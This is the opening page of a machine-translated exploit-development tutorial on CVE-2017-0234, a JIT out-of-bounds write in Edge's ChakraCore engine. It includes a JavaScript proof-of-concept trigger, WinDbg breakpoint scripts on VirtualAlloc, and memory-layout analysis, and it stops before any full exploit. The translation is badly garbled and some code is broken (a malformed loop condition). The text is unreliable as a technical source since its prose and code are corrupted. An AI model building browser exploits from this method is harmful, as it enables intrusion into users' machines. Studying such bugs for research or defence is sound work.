Edge no prior knowledge of the exploit-vulnerability warning-the black bar safety net

The background set forth
2007 held so far, in the pwn2own contest, the browser is always the main event. Watch the game at the same time, I believe a lot of friends have been eager to try. But do you remember how many times full of confidence, last and all the time being put on hold? The article main for the browser exploit no prior knowledge of the crowd, the author details the exploits of the process walk through some of the pit and summary of skills. Eventually reached in the solution to some common pain points at the same time, re-recovery we exploit the confidence, after all, which man once said: confidence is more than gold is also valuable.

Article target
Watch gangster fancy virtuoso, is unable to start? Seeing a thousand times, why not do it again. After all, seeing is believing, but also more interesting. Deloitte hands-on Operation, Zero in the browser stable pop-up the first calculator!

Hands-on practical
Here to CVE-2017-0234, for example, the ch version is: v1. 4. 3. the the poc file is as follows:
function jitBlock(arr, index)
{
arr[index] = 0xdeedbeef;
}
var arr = new Uint32Array(0x40000/4)
for(var i=0; i0x10000; i++){
jitBlock(arr, 0)
}
jitBlock(arr, 0x7fffffff)
windbg running in a poc, get the following crash message:
!
Comparison of the js file with the assembler, We easily found the rbx register on behalf of the entire typearray, r14 represents an array index. Vulnerability cause: jit code generation, over-optimization leads to an array out of bounds access.

Background knowledge
We now only know that this hole can be out of bounds write, then how to put this hole use up? To answer this question, you need to solve some fundamental problems: the
1. Vulnerability is the object of the allocation of the use to which the dispensers VirtualAlloc, the malloc, HeapAlloc, And MemGC be?
2. Assign whether the size of any value?
3. Vulnerability assignment of an object due to memory alignment reasons, the actual occupy how much space?
We One by one to solve the above problems.
1. Vulnerability is the object of the allocation of the use to which the dispensers VirtualAlloc, the malloc, HeapAlloc, And MemGC be?
To solve this problem, we decided to use which object the cross-border region accounted for live.
First, the fuzzy matching system in which the alloc-related api.
> x kernel32! virtual*
00007ff8fc40b0d0 KERNEL32! VirtualQueryStub (no parameter info>) 00007ff8fc40a2a0 KERNEL32! VirtualAllocStub (no parameter info>)
00007ff8fc4273e0 KERNEL32! VirtualProtectExStub () 00007ff8fc40b0b0 KERNEL32! VirtualProtectStub (no parameter info>)
00007ff8fc40ba70 KERNEL32! VirtualUnlockStub () 00007ff8fc4105b0 KERNEL32! VirtualAllocExNumaStub (no parameter info>)
00007ff8fc40a2c0 KERNEL32! VirtualFreeStub () 00007ff8fc4273c0 KERNEL32! VirtualAllocExStub (no parameter info>)
00007ff8fc40b0a0 KERNEL32! VirtualQueryExStub () 00007ff8fc4273d0 KERNEL32! VirtualFreeExStub (no parameter info>)
00007ff8fc40ed20 KERNEL32! VirtualLockStub () The key api parameters and return value printed out > bu KERNELBASE! VirtualAlloc ". if(@rdx>=0x40000){. printf "addr=%p size=%p\n ",rcx, rdx; gc} . else{gc}" > bu KERNELBASE! VirtualAlloc+0x5a ". if(1==2){} . else{. printf "ret=%p \n",rax;gc}" Re-run, you can determine the arr array is indeed by VirtualAlloc allocation, there are two associated with the allocation record, the assigned address is the same, size is not the same, interested students can continue to VirtualAlloc other parameters of the print out. As to why the same address for two times assignments, this issue we put behind the uniform misgivings, currently only focus on the exploit itself. ! [](/Article/UploadPic/2019-4/201944162049774.jpg) 2\. Assign whether the size of any value? To improve the exploit success rate, you first need to ensure that the vulnerability of stable reproduction. Here the first use of the conclusion, the reason above, the misgivings on the rear surface. > bu chakracore! Js::JavascriptArrayBuffer::IsValidVirtualBufferLength /* 1\. length >= 2^16 2\. length is power of 2 or (length > 2^24 and length is multiple of 2^24) 3\. the length is a multiple of 4K */ The allocation of the required length while satisfying the above condition, so len >= 2^(16+n) or > 2^(24+n). [Here, n satisfies the non-negative integer] So to meet the conditions of the minimum len is 2^16 = 0x10000 3\. Vulnerability assignment of an object due to the memory alignment, the actual occupy how much space? windbg, the address command can solve this doubt. 000001c321cc00d2 42893cab mov dword ptr [rbx+r13*4],edi ds:000001c221c9fffc=???????? 0:003> ! address rbx Usage: Base Address: 000001c021ca0000
End Address: 000001c021cb0000 Region Size: 0000000000010000 ( 64.000 kB)
State: 00001000 MEM_COMMIT
Protect: 00000004 PAGE_READWRITE
Type: 00020000 MEM_PRIVATE

[1] [2] [3] next